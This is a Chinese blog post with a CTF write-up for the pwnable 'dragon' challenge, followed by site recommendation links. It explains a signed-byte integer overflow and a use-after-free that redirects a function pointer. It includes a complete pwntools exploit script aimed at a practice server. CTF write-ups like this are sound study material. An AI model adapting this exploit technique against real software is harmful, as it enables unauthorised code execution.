pwnable_dragon(整数溢出+UAF)

最新推荐文章于 2024-08-09 09:21:14 发布
最新推荐文章于 2024-08-09 09:21:14 发布
阅读量431 收藏
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 UAF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106694198
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

pwnable_dragon(整数溢出+UAF)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,游戏结束后释放掉了ptr

也就是释放掉了v5,而当我们打赢游戏的时候,又malloc(0x10)并输入,然后又调用了v5里面的函数指针,由于v5之前free掉了,所以这里malloc(0x10)并输入,控制的就是v5指向的那块内存,将里面指针指向后面函数即可。

现在是如何才能赢得游戏,观察龙的血量,是一个byte

而赢得游戏的条件是龙的血量小于等于0

Byte的话超过127,就小于等于0了,因此,我们让龙的血量不断增加,最终溢出即可赢得游戏。第一次,我们故意输掉游戏,然后来到第二次,龙的血量初始化为80,也就是0x50,这样我们只需让龙的血量增加0x30即可轻松赢得游戏。

#coding:utf8
from pwn import *

#sh = process('./pwnable_dragon')
sh = remote('node3.buuoj.cn',29862)
def win():
   #第一次输掉
   sh.sendlineafter('[ 2 ] Knight','1')
   for i in range(2):
      sh.sendline('3')
      sh.sendline('3')
      sh.sendline('2')
   #第二次,dragon的血为80,我们让其增加溢出127后即可赢
   sh.sendlineafter('[ 2 ] Knight','1')
   for i in range(4):
      sh.sendline('3')
      sh.sendline('3')
      sh.sendline('2')


win()
sh.sendlineafter('The World Will Remember You As:',p32(0x08048DBF))

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 626
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
pwnable dragon
4ct10n
06-24 650
借着这段时间学UAF,又找了一道UAF的题目做了一下,这个题目很简单,看着WP写的,思路也非常的清晰。
pwnable[dragon](uaf)
九层台
01-24 354
很有意思的一个题目,做成了一个打龙,要是有个图形界面就更有意思了。这个题出乎意料的地方是漏洞的地方仅仅是free了之后对里面的值再操作。我的思维总以为一定要free了之后再malloc才会有漏洞的。改掉这个思维定式。 分析开始。 0x01数据结构 在这里可以看出来 0x02漏洞分析 PriestAttack函数中无论杀没杀死龙都会把龙free 但是在这里继续使用了龙结构里面的值。 接下来就是...
pwnable.kr dragon
you_need_me的博客
06-05 340
http://blog.sina.com.cn/s/blog_e23a215b0102wiap.html
安全漏洞--释放重引用(UAF)漏洞分析
关注互联网安全的小虾米一枚
04-26 6523
漏洞简介 未初始化漏洞一般是指堆栈变量没有设置就使用导致,或者可能更多的是部分初始化导致。 释放后再用漏洞是堆上的数据被释放后,某个残留地址没清除再用导致。其实就是未初始化漏洞。 二 原理分析 windows系统测试代码 #include #include int main(int argc, char * argv[])
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 504
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
程控滤波(DAC8811+UAF42+ADG5234)Altium设计 硬件原理图+PCB文件.rar
03-21
程控滤波(DAC8811+UAF42+ADG5234)Altium设计 硬件原理图+PCB文件,,Altium Designer 设计的工程文件,包括原理图及PCB文件,可以用Altium(AD)软件打开或修改,可作为你产品设计的参考。
eID_fido-uaf-core
05-14
标题 "eID_fido-uaf-core" 暗示了这是一个与电子身份证(eID)相关的项目,它利用了FIDO UAF(Universal Authentication Framework)核心技术。FIDO UAF是一种安全的身份验证标准,旨在提供强认证,以保护用户免受...
2021_UAF_SE_Nhom06
03-20
【标题】"2021_UAF_SE_Nhom06" 指的可能是一个软件工程项目的代码库,其中“UAF”可能是大学或机构的缩写,“SE”代表“Software Engineering”(软件工程),而“Nhom06”可能是项目组的编号或者课程的学期编号。...
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1444
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 917
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
08-09 539
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1138
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
某赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞复现(XVE-2024-19611)
0xSec
08-08 705
某赛通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 208
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
溢出、整型溢出UAF溢出、覆盖返回地址、覆盖函数指针、覆盖SEH、格式化字符串溢出、栈溢出利用
10-17
这些都是常见的漏洞类型,其中栈溢出、整型溢出UAF溢出、覆盖返回地址、格式化字符串溢出是比较常见的。栈溢出利用和覆盖函数指针、覆盖SEH则需要具体情况具体分析。 栈溢出:当程序向栈中写入超过其分配的空间时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值